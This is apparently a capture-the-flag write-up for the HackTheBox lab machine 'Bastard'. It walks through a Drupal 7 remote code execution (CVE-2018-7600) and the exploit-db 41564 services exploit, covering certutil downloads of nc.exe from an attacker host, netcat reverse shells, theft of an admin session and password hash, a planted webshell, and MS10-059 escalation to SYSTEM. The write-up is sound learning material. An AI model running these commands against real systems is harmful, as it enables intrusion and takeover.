> For the complete documentation index, see [llms.txt](https://squid22.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://squid22.gitbook.io/notes/htb-writeups/writeups/htb-bastard.md). # HTB - Bastard ![Bastard](/files/-M257KblgprS9UlcMW6i) ## Getting Root: 1. Enumerating port 80 shows the box is running **Drupal 7.54** which is vulnerable to remote code execution 2. After getting a low privilege shell, we escalate privilege to **SYSTEM** using **MS10-059** ### **Tools Used:** **`nmap, curl, windows-exploit-suggester.py, certutil`** ## Nmap ``` nmap -sC -sV -p 80,135,49154 -oA Bastard.nmap 10.10.10.9 Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-10 14:56 EDT Nmap scan report for 10.10.10.9 Host is up (0.038s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 |_http-generator: Drupal 7 (http://drupal.org) | http-methods: |_ Potentially risky methods: TRACE | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Microsoft-IIS/7.5 |_http-title: Welcome to 10.10.10.9 | 10.10.10.9 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 87.21 seconds ``` ## Enumerating Port 80 Checking **`robots.txt`** ``` curl -s http://10.10.10.9/robots.txt # # robots.txt # # This file is to prevent the crawling and indexing of certain parts # of your site by web crawlers and spiders run by sites like Yahoo! # and Google. By telling these "robots" where not to go on your site, # you save bandwidth and server resources. # # This file will be ignored unless it is at the root of your host: # Used: http://example.com/robots.txt # Ignored: http://example.com/site/robots.txt # # For more information about the robots.txt standard, see: # http://www.robotstxt.org/robotstxt.html User-agent: * Crawl-delay: 10 # CSS, JS, Images Allow: /misc/*.css$ Allow: /misc/*.css? Allow: /misc/*.js$ Allow: /misc/*.js? Allow: /misc/*.gif Allow: /misc/*.jpg Allow: /misc/*.jpeg Allow: /misc/*.png Allow: /modules/*.css$ Allow: /modules/*.css? Allow: /modules/*.js$ Allow: /modules/*.js? Allow: /modules/*.gif Allow: /modules/*.jpg Allow: /modules/*.jpeg Allow: /modules/*.png Allow: /profiles/*.css$ Allow: /profiles/*.css? Allow: /profiles/*.js$ Allow: /profiles/*.js? Allow: /profiles/*.gif Allow: /profiles/*.jpg Allow: /profiles/*.jpeg Allow: /profiles/*.png Allow: /themes/*.css$ Allow: /themes/*.css? Allow: /themes/*.js$ Allow: /themes/*.js? Allow: /themes/*.gif Allow: /themes/*.jpg Allow: /themes/*.jpeg Allow: /themes/*.png # Directories Disallow: /includes/ Disallow: /misc/ Disallow: /modules/ Disallow: /profiles/ Disallow: /scripts/ Disallow: /themes/ # Files Disallow: /CHANGELOG.txt Disallow: /cron.php Disallow: /INSTALL.mysql.txt Disallow: /INSTALL.pgsql.txt Disallow: /INSTALL.sqlite.txt Disallow: /install.php Disallow: /INSTALL.txt Disallow: /LICENSE.txt Disallow: /MAINTAINERS.txt Disallow: /update.php Disallow: /UPGRADE.txt Disallow: /xmlrpc.php # Paths (clean URLs) Disallow: /admin/ Disallow: /comment/reply/ Disallow: /filter/tips/ Disallow: /node/add/ Disallow: /search/ Disallow: /user/register/ Disallow: /user/password/ Disallow: /user/login/ Disallow: /user/logout/ # Paths (no clean URLs) Disallow: /?q=admin/ Disallow: /?q=comment/reply/ Disallow: /?q=filter/tips/ Disallow: /?q=node/add/ Disallow: /?q=search/ Disallow: /?q=user/password/ Disallow: /?q=user/register/ Disallow: /?q=user/login/ Disallow: /?q=user/logout/ ``` Checking **`CHANGELOG.TXT`** reveals the version of **Drupal** to be **7.54** ``` curl -s http://10.10.10.9/CHANGELOG.TXT | head -n 20 Drupal 7.54, 2017-02-01 ----------------------- - Modules are now able to define theme engines (API addition: https://www.drupal.org/node/2826480). - Logging of searches can now be disabled (new option in the administrative interface). - Added menu tree render structure to (pre-)process hooks for theme_menu_tree() (API addition: https://www.drupal.org/node/2827134). - Added new function for determining whether an HTTPS request is being served (API addition: https://www.drupal.org/node/2824590). - Fixed incorrect default value for short and medium date formats on the date type configuration page. - File validation error message is now removed after subsequent upload of valid file. - Numerous bug fixes. - Numerous API documentation improvements. - Additional performance improvements. - Additional automated test coverage. ``` ## Exploit Found the following exploit for Drupal 7.54 on GitHub. {% embed url="" %} ```bash # On my kali box python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "ping 10.10.14.3" ============================================================================= | DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) | | by pimps | ============================================================================= [*] Poisoning a form and including it in cache. [*] Poisoned form ID: form-i725q67HTHWEJND2D2j81b32GnpnfR0-FrPu9EtnaHs [*] Triggering exploit to execute: ping 10.10.14.3 Pinging 10.10.14.3 with 32 bytes of data: Reply from 10.10.14.3: bytes=32 time=38ms TTL=63 Reply from 10.10.14.3: bytes=32 time=38ms TTL=63 Reply from 10.10.14.3: bytes=32 time=38ms TTL=63 Reply from 10.10.14.3: bytes=32 time=38ms TTL=63 Ping statistics for 10.10.14.3: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 38ms, Maximum = 38ms, Average = 38ms # tcpdump -nni tun0 icmp tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes 16:06:52.106926 IP 10.10.10.9 > 10.10.14.3: ICMP echo request, id 1, seq 5, length 40 16:06:52.106955 IP 10.10.14.3 > 10.10.10.9: ICMP echo reply, id 1, seq 5, length 40 16:06:53.100795 IP 10.10.10.9 > 10.10.14.3: ICMP echo request, id 1, seq 6, length 40 16:06:53.100823 IP 10.10.14.3 > 10.10.10.9: ICMP echo reply, id 1, seq 6, length 40 16:06:54.099473 IP 10.10.10.9 > 10.10.14.3: ICMP echo request, id 1, seq 7, length 40 16:06:54.099566 IP 10.10.14.3 > 10.10.10.9: ICMP echo reply, id 1, seq 7, length 40 16:06:55.097763 IP 10.10.10.9 > 10.10.14.3: ICMP echo request, id 1, seq 8, length 40 16:06:55.097801 IP 10.10.14.3 > 10.10.10.9: ICMP echo reply, id 1, seq 8, length 40 ``` That confirms we have remote command execution ## Getting a shell ```bash python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "certutil -urlcache -f -split http://10.10.14.3/nc.exe" ============================================================================= | DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) | | by pimps | ============================================================================= [*] Poisoning a form and including it in cache. [*] Poisoned form ID: form-YTR40kc-mSMxpyUSUJ2dLSE4dJNb9wwxn-iADCFwEK0 [*] Triggering exploit to execute: certutil -urlcache -f -split http://10.10.14.3/nc.exe **** Online **** 0000 ... e800 CertUtil: -URLCache command completed successfully. # I see the box downloaded the executable python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.9 - - [10/Mar/2020 16:12:38] "GET /nc.exe HTTP/1.1" 200 - 10.10.10.9 - - [10/Mar/2020 16:12:38] "GET /nc.exe HTTP/1.1" 200 - # triggered the revserve shell python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "nc.exe 10.10.14.3 9001 -e cmd.exe" ============================================================================= | DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) | | by pimps | ============================================================================= [*] Poisoning a form and including it in cache. [*] Poisoned form ID: form-vKZAyRgmhvQT0vwjVnFd7o8_kDB1RJozNGyygzMCcGY [*] Triggering exploit to execute: nc.exe 10.10.14.3 9001 -e cmd.exe # Got a shell!!! rlwrap nc -lnvp 9001 listening on [any] 9001 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.10.9] 59893 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\inetpub\drupal-7.54> ``` ## Privilege Escalation Windows Exploit Suggester ```bash [*] initiating winsploit version 3.3... [*] database file detected as xls or xlsx based on extension [*] attempting to read from the systeminfo input file [+] systeminfo input file read successfully (utf-8) [*] querying database file for potential vulnerabilities [*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits [*] there are now 197 remaining vulns [+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin [+] windows version identified as 'Windows 2008 R2 64-bit' [*] [M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical [M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important [E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical [*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC [*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC [*] [E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important [M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important [M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical [E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important [E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important [M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical [M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical ``` ## Got SYSTEM using MS10-059 Downloaded the exploit to the target ```bash certutil -urlcache -f -split http://10.10.14.3/MS10-059.exe **** Online **** 000000 ... 0bf800 CertUtil: -URLCache command completed successfully. C:\inetpub\drupal-7.54>MS10-059.exe 10.10.14.3 9002 MS10-059.exe 10.10.14.3 9002 /Chimichurri/-->This exploit gives you a Local System shell
/Chimichurri/-->Changing registry values...
/Chimichurri/-->Got SYSTEM token...
/Chimichurri/-->Running reverse shell...
/Chimichurri/-->Restoring default registry values...
``` Got a shell with SYSTEM privileges ```bash python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.9 - - [10/Mar/2020 16:19:34] "GET /MS10-059.exe HTTP/1.1" 200 - 10.10.10.9 - - [10/Mar/2020 16:19:35] "GET /MS10-059.exe HTTP/1.1" 200 - ^C Keyboard interrupt received, exiting. root@kdeali:~/HackTheBox/Bastard/smb# rlwrap nc -lnvp 9002 listening on [any] 9002 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.10.9] 59897 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\inetpub\drupal-7.54>whoami whoami nt authority\system ``` System Information ```php Host Name: BASTARD OS Name: Microsoft Windows Server 2008 R2 Datacenter OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00496-001-0001283-84782 Original Install Date: 18/3/2017, 7:04:46 System Boot Time: 10/3/2020, 8:39:41 System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 2 Processor(s) Installed. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 2.047 MB Available Physical Memory: 1.562 MB Virtual Memory: Max Size: 4.095 MB Virtual Memory: Available: 3.590 MB Virtual Memory: In Use: 505 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.9 ``` ## Another Way To Do the Box: ```bash # searchsploit drupal 7 Exploit Title: Drupal 7.x Module Services - Remote Code Execution Exploit Path: exploits/php/webapps/41564.php ``` I tried running this exploit but keep getting errors at execution. For this exploit to work, you might need to install **`php-curl`** ```bash apt install php-curl ``` From **`gobuster`** I was able to see **`/rest`** in the output. So I used curl to check it out. ```bash curl -s http://10.10.10.9/rest Services Endpoint "rest_endpoint" has been setup successfully. ``` With that information, I modified the **php** exploit as follows: ( I also had to modified a few syntax errors which basically needed to be commented out) ```php $url = 'http://10.10.10.9'; #$endpoint_path = '/rest_endpoint'; $endpoint_path = '/rest'; $endpoint = 'rest_endpoint'; ``` ### Running the exploit ```php php 41564.php # Exploit Title: Drupal 7.x Services Module Remote Code Execution # Vendor Homepage: https://www.drupal.org/project/services # Exploit Author: Charles FOL # Contact: https://twitter.com/ambionics # Website: https://www.ambionics.io/blog/drupal-services-module-rce #!/usr/bin/php Stored session information in session.json Stored user information in user.json Cache contains 7 entries File written: http://10.10.10.9/dixuSOspsOUU.php ``` ### Got two files 1\. **session.json**\ 2\. **user.json** ```php cat user.json { "uid": "1", "name": "admin", "mail": "drupal@hackthebox.gr", "theme": "", "created": "1489920428", "access": "1583872959", "login": 1583873660, "status": "1", "timezone": "Europe\/Athens", "language": "", "picture": null, "init": "drupal@hackthebox.gr", "data": false, "roles": { "2": "authenticated user", "3": "administrator" }, "rdf_mapping": { "rdftype": [ "sioc:UserAccount" ], "name": { "predicates": [ "foaf:name" ] }, "homepage": { "predicates": [ "foaf:page" ], "type": "rel" } }, "pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE" ``` ```php cat session.json { "session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913", "session_id": "Dj8-dy-6rEzLuEOdOvMXqf8FQJNsk2P1ZVzhbH5K-bc", "token": "XvZ60x9iDr2E4nsl4DzbpW_2tKEkbMTE45CFH7J2PEY" } ``` ### Login as admin I used the Firefox plugin **Cookie Quick Manager** and added the cookie from the session.json file ![](/files/-M25HdvJ2nruAcDzTeOc) Refresh the page **`http://10.10.10.9`** ![](/files/-M25I76w5Clq9wNUh4e5) After hitting refresh on the site, you should be logged in as Admin ![](/files/-M25MIncPM_FKCH6dYIZ) Go to Modules and and enable PHP Filter ![](/files/-M25MY-gzugjXFjmRyqD) Scroll all the way to the bottom and click **Save Configuration** ![](/files/-M25MeYkYxfsknfaTCfe) ### Getting a reverse shell Click on "**Add Content**" ![](/files/-M25RIe81yGIwjegaFAH) Add "**Basic Page**" ![](/files/-M25RZ9y2MM2f0du2V8z) ### Add your php code Add a title, your PHP code and change the Text format to PHP code. Then scroll all the way to the bottom and click Save. ![](/files/-M25S7zwMa6YoNRPQ2y8) In my case, the PHP code I used is a webshell I got from GitHub. This webshell allows me to execute any commands on the target and even upload files such as the compiled binary for **MS10-059** we used on method 1 and get a shell as SYSTEM. ![](/files/-M25SeQsKb19-uwQURjE) ![](/files/-M25TMtT50vcId4KrVHA) ![](/files/-M25T_cSzPJKOPETizFB) ![](/files/-M25UFc-xUuubrK3Mzpj) ### Getting the reverse shell ![](/files/-M25UkaxIAu19h3YsuF4) ### Got a shell as SYSTEM ```php rlwrap nc -lnvp 9009 listening on [any] 9009 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.10.9] 60226 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\inetpub\drupal-7.54>whoami whoami nt authority\system C:\inetpub\drupal-7.54> ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://squid22.gitbook.io/notes/htb-writeups/writeups/htb-bastard.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.